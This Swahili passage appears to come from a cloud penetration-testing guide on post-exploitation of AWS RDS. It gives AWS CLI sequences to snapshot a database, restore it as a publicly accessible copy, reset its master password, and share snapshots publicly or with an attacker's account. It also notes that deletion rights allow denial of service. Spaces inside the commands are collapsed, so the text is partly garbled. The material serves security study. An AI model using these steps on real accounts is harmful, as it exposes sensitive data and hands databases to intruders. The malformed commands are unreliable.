Ikiwa muhusika ana idhini za kutosha, anaweza kufanya DB iweze kupatikana kwa umma kwa kuunda picha ya DB, na kisha DB inayoweza kupatikana kwa umma kutoka kwa picha hiyo.
awsrdsdescribe-db-instances# Get DB identifierawsrdscreate-db-snapshot \--db-instance-identifier <db-id> \--db-snapshot-identifier cloudgoat# Get subnet groups & security groupsawsrdsdescribe-db-subnet-groupsawsec2describe-security-groupsawsrdsrestore-db-instance-from-db-snapshot \--db-instance-identifier "new-db-not-malicious" \--db-snapshot-identifier <scapshotId> \--db-subnet-group-name <dbsubnetgroup> \--publicly-accessible \--vpc-security-group-ids <ec2-securitygroup>awsrdsmodify-db-instance \--db-instance-identifier "new-db-not-malicious" \--master-user-password 'Llaody2f6.123' \--apply-immediately# Connect to the new DB after a few mins
Mshambuliaji mwenye ruhusa hizi anaweza kuunda nakala ya DB na kuifanya ipatikane kwa umma. Kisha, anaweza tu kuunda kwenye akaunti yake mwenyewe DB kutoka kwa nakala hiyo.
Ikiwa mshambuliaji haina rds:CreateDBSnapshot, bado anaweza kufanya nakala zilizoundwa na wengine kuwa zinafikika kwa umma.
# create snapshotawsrdscreate-db-snapshot--db-instance-identifier<db-instance-identifier>--db-snapshot-identifier<snapshot-name># Make it public/share with attackers accountaws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"}
Athari Inayowezekana: Kupata ufikivu wa taarifa nyeti au kutekeleza hatua zisizoidhinishwa kwa kutumia vibali vilivyovuja.
rds:DeleteDBInstance
Mshambuliaji mwenye vibali hivi anaweza kufanya DoS kwa mifano ya RDS iliyopo.
